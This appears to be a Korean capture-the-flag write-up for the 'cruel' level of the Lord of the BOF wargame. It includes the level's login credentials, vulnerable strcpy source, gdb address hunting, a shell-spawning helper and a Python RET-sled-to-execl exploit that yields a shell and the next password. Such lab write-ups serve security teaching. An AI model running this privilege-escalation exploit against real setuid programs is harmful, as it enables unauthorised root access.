반응형

ID | dark_stone

PW | let there be light


으로 로그인합니다.



$ ls -l


를 이용해  어떤 파일과 폴더가 있는지 확인하고,


$ cat [문제이름].c


를 이용해 소스코드를 확인합니다.




1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
/*
    The Lord of the BOF : The Fellowship of the BOF 
    - cruel
    - Local BOF on Fedora Core 4
    - hint : no more fake ebp, RET sleding on random library
*/
 
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
 
int main(int argc, char *argv[])
{
    char buffer[256];
 
    if(argc < 2){
        printf("argv error\n");
        exit(0);
    }
 
    strcpy(buffer, argv[1]);
    printf("%s\n", buffer);
}
 
cs



[dark_stone@Fedora_2ndFloor ~]$ gdb -q cruel

(no debugging symbols found)

Using host libthread_db library "/lib/libthread_db.so.1".

(gdb) b* main+109

Breakpoint 1 at 0x8048451

(gdb) r AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Starting program: /home/dark_stone/cruel AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

(no debugging symbols found)

(no debugging symbols found)

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA


Breakpoint 1, 0x08048451 in main ()

(gdb) x/20x $esp-20

0xbf85c778: 0x41414141 0x41414141 0x41414141 0x41414141

0xbf85c788: 0x41414141 0x007bad00 0x00000002 0xbf85c814

0xbf85c798: 0xbf85c820 0xbf85c7d0 0x00795898 0x007a3878

0xbf85c7a8: 0xb7f5e690 0x00000001 0x008caff4 0x007a2ca0

0xbf85c7b8: 0x08048454 0xbf85c7e8 0xbf85c790 0x007bad44

(gdb) x/2x 0x008caff4

0x8caff4: 0x008cad3c 0x007bab16



0x008caff4가 0x008cad3c를 가리키고 있다.

ret sleding으로 쓱 싹



0x08048450 <main+108>: leave  

0x08048451 <main+109>: ret    



(gdb) b main

Breakpoint 1 at 0x80483ed

(gdb) r

Starting program: /home/dark_stone/cruel 

(no debugging symbols found)

(no debugging symbols found)


Breakpoint 1, 0x080483ed in main ()

(gdb) p execl

$1 = {<text variable, no debug info>} 0x832d68 <execl>




1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
#include <stdio.h>
 
#include <stdlib.h>
 
 
 
int main(void)
 
{
 
        setreuid(geteuid(),geteuid());
 
        setregid(getegid(),getegid());
 
        system("/bin/sh");
 
}
cs

[dark_stone@Fedora_2ndFloor ~]$ gcc -o `python -c 'print "\x3c\xad\x8c\x00"'` ex.c


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
import os
import struct
 
 
p32 = lambda x: struct.pack("<I", x)
 
target = "/home/dark_stone/cruel"
 
ret = 0x8048451
execl = 0x832d68
 
payload = 'A' * 260
 
payload += p32(ret) * 7
payload += p32(execl)
 
os.execv(target, (target, payload[:-1]))
 
cs


[dark_stone@Fedora_2ndFloor ~]$ vi ex.py

[dark_stone@Fedora_2ndFloor ~]$ python ex.

python: can't open file 'ex.': [Errno 2] No such file or directory

[dark_stone@Fedora_2ndFloor ~]$ python ex.py

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ�Q�Q�Q�Q�Q�Q�h-�

sh-3.00$ my-pass

euid = 501

come on, come over


반응형

+ Recent posts